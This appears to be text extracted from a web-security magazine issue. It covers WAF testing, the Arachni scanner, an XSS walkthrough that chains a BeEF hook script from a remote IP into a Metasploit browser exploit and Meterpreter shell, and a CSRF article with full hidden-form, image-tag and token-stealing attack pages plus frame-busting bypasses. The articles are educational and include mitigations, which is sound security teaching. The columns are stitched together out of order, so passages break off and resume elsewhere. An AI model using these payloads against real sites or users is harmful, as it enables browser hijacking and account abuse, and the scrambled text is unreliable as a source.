• Are all known and unknown threats blocked?
A further point is the protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only granted those privileges that they need for their work or for the use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for a safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions are intuitive, clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface that is identical across several of the manufacturer's products, or, even better, a management center which administrators can use to manage numerous other network and security products alongside the WAF. The administrators can then rely on familiar settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
WEB APP VULNERABILITIES
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org/ and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note: these are the same commands as with the Linux installation; see Listing 2).
In case of weird error messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/localso.lst
Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. Enter in ash:
$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst
Exit ash
Light my Fire
How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command line.
The GUI can be started by executing the following commands:
$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers; the dispatcher(s) will run the actual scan.
Figure 1 Edit Dispatchers
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1)
• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues are detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, …
• Settings: the settings screens allow you to add cookies and headers, limit the scan to certain directories, …
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher
  • Tutorial: serves as an example
  • Scheduler: schedules and runs scan jobs at a specific time
• Log: overview of actions taken by the GUI
Your First Scan
We will use both the command line and the GUI. First the command line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:
$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem for your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*,-xss_* http://www.example.com
The above will load all modules except the modules related to Cross-Site Scripting (XSS).
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for the list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.
Figure 2. Start a scan screen
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos
  <tasos.laskos@gmail.com>

  This is free software; you can copy and distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on wordlists generated
# from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing/
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return unless @@__directories.empty?

        read_file( 'all-dirs.txt' ) do |file|
            @@__directories << file unless file.include?( '.' )
        end
    end

    def run
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each do |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )

            log_remote_directory_if_exists( url ) do |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            end
        end

        @@__audited << path
    end

    def self.info
        {
            :name        => 'SVNDigger Dirs',
            :description => %q{Finds directories based on wordlists
                created from open source repositories. The wordlist
                utilized by this module is vast and will add a
                considerable amount of time to the overall scan time.},
            :author      => 'Herman Stevens <herman.stevens@gmail.com>',
            :version     => '0.1',
            :references  => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing/',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets     => { 'Generic' => 'all' },
            :issue       => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces are exposed
                    or confidential information.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree; you'll find the modules directory. In there you'll find two directories: audit and recon. Move into the recon directory, where we will create our Ruby module.
Arachni makes it really easy: if your module needs external files, it will search in a subdirectory with the same name. Example: if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needed to be protected and you forgot it, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about which technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows (Listing 3).
The code does not need a lot of explanation: it checks whether or not a specific directory exists; if yes, it forwards the name to the Arachni Trainer (which will include the directory in further scans) and also creates a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:
• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:
• No AJAX and JSON support
• No JavaScript support
This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup; this shows that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would operate in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this.
HTML Page

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS – BeEF – Metasploit Exploitation
Figure 2. BeEF after configuration
Cross Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1. User enters in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of the user clicking on a link which will generate a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src=
'http://192.168.56.101/beef/hook/beefmagic.js.php'>
</script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side, or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules – Alert Dialog. This will result in a little popup box popping up on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).
So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of simple text, the attacker enters JavaScript into the box, the JavaScript will execute on the user's machine rather than being displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1).
BeEF – Hook the User's Browser
Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not what an attacker will stop at. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball and copy it into your web server directory.
Figure 3. Connection with the BeEF controller
Figure 4. What the attacker will see
Figure 5. What the victim will see
Figure 6. Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten in the victim's browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect All Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and Get a Shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user's browser
Figure 8. Starting Metasploit
Figure 9. The jobs command
Figure 10. Metasploit after clicking Send Now
Figure 11. Meterpreter window – screenshot 1
Figure 12. Meterpreter window – screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point of time we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools (Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit) and install them on it. We can then use these to port-scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13. Meterpreter window – screenshot 3
• Make a list of parameters whose values depend on user input, and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output, as in a), must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
• White-list and black-list filtering can also be used to completely disallow specific characters in user input fields.
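As a sketch of the encoding step in the second point: the helper below is a minimal illustration in JavaScript (the article's server-side examples use PHP, where htmlspecialchars() plays the same role); the function name escapeHtml is mine, not something from the article.

```javascript
// Minimal HTML output encoding: neutralise the characters that
// allow user input to break out of an HTML text context.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, '&amp;')   // must run first, or later escapes get double-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// The earlier search payload is now rendered as harmless text:
console.log('The parameter passed is ' +
  escapeHtml('<script>alert(document.domain)</script>'));
```

With this in place, the reflected search page prints the tag literally instead of executing it.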
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So, while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvinddoraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings – http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:

<img src="http://twitter.com/home?status=evil.com"
style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
• Only accept POST – This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking – Some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
• Requiring multi-step transactions – CSRF attacks can perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from the CAPTCHA image every time he submits a form might make users stop visiting your website. This is why websites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1. HTML code used to bypass protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like www.evil.com" >
<input type="submit" >
</form>
<script>document.Form.submit()</script>
</div>
index.php (Victim website)
And the webpage which processes the request and stores the message only if the given token is correct:
post.php (Victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4).
index.php (Evil website)
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'
var token = window.frames[0].document.forms['messageForm'].token.value
Browser settings are not hard to modify, so the best approach to web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed.
<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
It consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, so they can be compared after the page form is submitted.
Subverting one-time tokens is usually attempted with brute-force attacks. Brute-forcing one-time tokens is worthwhile only if the mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2. Wrong token
<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
session_start();
if($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, $message."\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1

<script>
window.onbeforeunload = function() {
  return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) { document.documentElement.style.display = 'block'; }
else { top.location = self.location; }
</script>
This protects the web application even if an attacker loads the webpage in a browser with JavaScript disabled.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company, and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006. Then he seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethics, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has transformed his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF), http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
  var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
  var myForm = document.myForm;
  myForm.token.value = token;
  myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" >
<input type="hidden" name="token" value="" >
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms, up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests. In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone, worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how good their respective knowledge was.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place, or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing websites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of further systems that follow on, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications, one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements for service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher.
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field. They now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet also offers many possibilities for concealment and making actions anonymous. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of new technology and the securing of the new technology; both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: the attackers have started to combine these methods more often in order to obtain even higher success rates. And here it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that the smaller companies rarely patch the weak points. They launch automated attacks in order to identify – with high efficiency – as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would have to increase the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult, but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then making deep inroads into its basic structures. This is not only tedious, but also harbors the danger of making mistakes. Another example is programs that use nothing but the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity as to whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the program developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
